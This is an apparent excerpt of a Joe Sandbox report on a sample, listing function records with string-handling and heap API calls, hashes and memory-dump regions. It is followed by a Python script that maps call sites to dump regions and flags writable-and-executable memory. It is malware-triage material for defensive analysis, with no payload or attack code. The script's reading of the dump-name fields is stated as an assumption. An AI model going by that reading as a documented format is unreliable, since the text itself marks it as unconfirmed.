                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: c16e5e8e442c2b33ec5a268060a70a3b4a5410ff2dfc8dccaa6cf518c2e1dd0d
                          • Instruction ID: 66a20c82eede8fce704cfc9ff731d2ab95806dd89c0cec6adee9b06f294d50aa
                          • Opcode Fuzzy Hash: c16e5e8e442c2b33ec5a268060a70a3b4a5410ff2dfc8dccaa6cf518c2e1dd0d
                          • Instruction Fuzzy Hash: 8FF09632908618DBD7A5BB78980FB7D33A07F00720F244109F754A63D2DF6C5940DA6A
                          APIs
                          • lstrlen.KERNEL32(------,007D5BEB), ref: 007F731B
                          • lstrcpy.KERNEL32(00000000), ref: 007F733F
                          • lstrcat.KERNEL32(?,------), ref: 007F7349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: 1984848b2bc6a3b07d128851477f1e3bfb2ab7a79d9aa1187483ff864bfd1946
                          • Instruction ID: a914dbc74743f3ce799a08f2fa1cf34ec050ac5cb789765c38db3a998694e663
                          • Opcode Fuzzy Hash: 1984848b2bc6a3b07d128851477f1e3bfb2ab7a79d9aa1187483ff864bfd1946
                          • Instruction Fuzzy Hash: 0BF039B45043069FDB289F75DC49927BAF8EF84700318882DA8DAC3315EB38E842CB10
                          APIs
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3422
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3471
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3497
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: bf2f3502b8504abe53921c21401ca14613907b1e35732dd15ae027a1afe224e6
                          • Instruction ID: b828d51dfba09b59be15f88ab86ac3076eead6a84cb5cda0a5f44b0ecdfb0415
                          • Opcode Fuzzy Hash: bf2f3502b8504abe53921c21401ca14613907b1e35732dd15ae027a1afe224e6
                          • Instruction Fuzzy Hash: 2212EE70B022419FDB58CF2AC558B25B7E5AF48718B19C1AED409DB3A2D77AED42CF40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7CAF
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D58
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D76
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: a8f505b894f6bd0fe358b89e37fca368bcf1f002ccb00f9e3b3f742ddb5f46b0
                          • Instruction ID: b78b3900a9d6b41de2821a939db13c9d92fbed6e6d1d158a02c52b8a4f111243
                          • Opcode Fuzzy Hash: a8f505b894f6bd0fe358b89e37fca368bcf1f002ccb00f9e3b3f742ddb5f46b0
                          • Instruction Fuzzy Hash: 7431487230A2848BE728DD6DE88092AF3EDEF98760B30452AF141CB651E7759C40C3B4
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 007D6F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D6F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: fd84f8900aa35a2227d2d276a708bc1118eba5fe760b3b5a1c76bb0a286be492
                          • Instruction ID: ac65134e0eb54cb1a3ec545385e37fc3946c5a680fd77cde51f8facb15a944ba
                          • Opcode Fuzzy Hash: fd84f8900aa35a2227d2d276a708bc1118eba5fe760b3b5a1c76bb0a286be492
                          • Instruction Fuzzy Hash: 8D218EB0600A019BEB20CB60DC84BBB73F8EB44704F44486EF986CBA85F7B9E945C751
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F244C
                          • lstrlen.KERNEL32(00000000), ref: 007F24E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F2570
                          • lstrlen.KERNEL32(00000000), ref: 007F2577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4b109bfe3643900cdd90e910bac71b94062f9f162ba11b58c6762d3443c4c75d
                          • Instruction ID: 997c916f870041ecefc73c9fc12d2b7bb1007558c95a742d0e06721e7bb64d46
                          • Opcode Fuzzy Hash: 4b109bfe3643900cdd90e910bac71b94062f9f162ba11b58c6762d3443c4c75d
                          • Instruction Fuzzy Hash: 8A81E4B1E0120D9BDB14CF94DC44BBEB7B5AF84300F1481A9E608A7382EB799D43CB95
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007F15A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F15D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1611
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 280074923e9c489a2a3e9d8d22e0a0d288da2900fa93fc6911ca300493ec7b95
                          • Instruction ID: de77d0979f12a849ee236efcfac5d539798ff5edd75f4504b624442b567abfbc
                          • Opcode Fuzzy Hash: 280074923e9c489a2a3e9d8d22e0a0d288da2900fa93fc6911ca300493ec7b95
                          • Instruction Fuzzy Hash: 3B210874601B06CBD724DF6AD458A27B7F8AF94700F448A1DA896D7B41DB38F812CBA0
                          APIs
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000), ref: 007D162D
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D164F
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D1671
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D1693
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: bf25c404241d6fd3554c623029be68b7659eab61e8b317e109b2a4e6a5865aa3
                          • Instruction ID: f42bbc502a89190ddd6eebee8c0326fb147a8f512d056e2cd471a061971b3250
                          • Opcode Fuzzy Hash: bf25c404241d6fd3554c623029be68b7659eab61e8b317e109b2a4e6a5865aa3
                          • Instruction Fuzzy Hash: 3231D674A01B42EFD724DF3AD598952BBF5BF48300740492EA896C3B10EB38F812CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007D162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1671
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1693
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b608ca9d34bcd35c258a6297cabe57169d351aa350ed758639cefe8b60be9e6a
                          • Instruction ID: 99278d1ed6128022253a61c6182fe0924476e56c903d7041e0c351eccb31fc07
                          • Opcode Fuzzy Hash: b608ca9d34bcd35c258a6297cabe57169d351aa350ed758639cefe8b60be9e6a
                          • Instruction Fuzzy Hash: A111EC74A11B02ABDB249F75D45C927B7F8BF44701748462EA496C3B51EB38F802CB90
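The call-site and memory-dump lines in a record like the one above can be cross-checked mechanically rather than by eye. The Python below is an added example written for this page, not Joe Sandbox code: it parses the "APIs" and "Memory Dump Source" lines of the record above (copied into the script as its sample input), decodes the protection field of each .sdmp name as a Windows PAGE_* constant, and maps each lstrcpy call site to the dump region that contains it. The .sdmp field layout, the PAGE_* reading of the fifth field, and the rule that a region extends to the next region's base (the listing gives no sizes) are assumptions inferred from the listing, not a documented format; PAGE_PROTECTION, Region, ApiRef, parse_regions, parse_api_refs, region_for and triage are the example's own names.

```python
"""Triage helper for Joe Sandbox function listings (added example, not part of
the report).  Parses 'Memory Dump Source' and 'APIs' lines, decodes the
protection field of each .sdmp name, and maps call sites to dump regions."""
import re
from dataclasses import dataclass

# ASSUMPTION: .sdmp name layout inferred from the listing, not documented:
# <8hex>.<8hex>.<timestamp>.<16hex base addr>.<8hex protection>.<3 x 8hex>.sdmp
SDMP_RE = re.compile(
    r"(?P<name>[0-9A-Fa-f]{8}\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<prot>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp)"
)
# Matches e.g. 'lstrcpy.KERNEL32(00000000,?), ref: 007D164F'
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# winnt.h PAGE_* constants; the listing's protection field takes the values
# 0x04, 0x40 and 0x80, which match these (assumed reading, see above).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITABLE_AND_EXECUTABLE = {0x40, 0x80}  # both allow writing and executing


@dataclass(frozen=True)
class Region:
    name: str
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection & 0xFF, f"0x{self.protection:08X}")

    @property
    def is_wx(self) -> bool:
        return (self.protection & 0xFF) in WRITABLE_AND_EXECUTABLE


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int


def parse_regions(text: str) -> list:
    """All distinct dump regions named in the text, sorted by base address."""
    seen = {}
    for m in SDMP_RE.finditer(text):
        seen.setdefault(m["name"], Region(m["name"], int(m["base"], 16), int(m["prot"], 16)))
    return sorted(seen.values(), key=lambda r: r.base)


def parse_api_refs(text: str) -> list:
    """Every 'api.MODULE(args), ref: addr' entry as an ApiRef."""
    return [ApiRef(m["api"], m["module"],
                   tuple(a.strip() for a in m["args"].split(",")), int(m["ref"], 16))
            for m in API_RE.finditer(text)]


def region_for(addr: int, regions: list):
    """Region with the highest base <= addr.  ASSUMPTION: the listing gives no
    sizes, so each region is taken to extend up to the next region's base."""
    best = None
    for r in regions:  # regions are sorted ascending by base
        if r.base <= addr:
            best = r
    return best


def triage(text: str) -> dict:
    regions = parse_regions(text)
    return {
        "regions": regions,
        "wx_regions": [r for r in regions if r.is_wx],
        "call_sites": [(ref, region_for(ref.ref, regions)) for ref in parse_api_refs(text)],
    }


# Sample input: the APIs and Memory Dump Source lines of the record above.
LISTING = """
lstrcpy.KERNEL32(00000000), ref: 007D162D
lstrcpy.KERNEL32(00000000,?), ref: 007D164F
lstrcpy.KERNEL32(00000000,?), ref: 007D1671
lstrcpy.KERNEL32(00000000,?), ref: 007D1693
Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    result = triage(LISTING)
    for reg in result["regions"]:
        print(f"{reg.base:#010x} {reg.protection_name}{'  <-- writable+executable' if reg.is_wx else ''}")
    for ref, reg in result["call_sites"]:
        print(f"{ref.module}!{ref.api}{ref.args} at {ref.ref:#010x} -> dump base {reg.base:#010x}")
```

Every lstrcpy call site resolves to the dump based at 007D1000, the first region after the module's 007D0000 page, which is PAGE_READWRITE while 007D1000 and all but two of the other dumps are writable and executable. Regions that are both writable and executable inside a PE image are the usual footprint of code rewritten in memory after load, so they are the dumps to open in a disassembler first; the script only tells you where to look, the protection reading is an assumption and should be confirmed against the process's actual memory map.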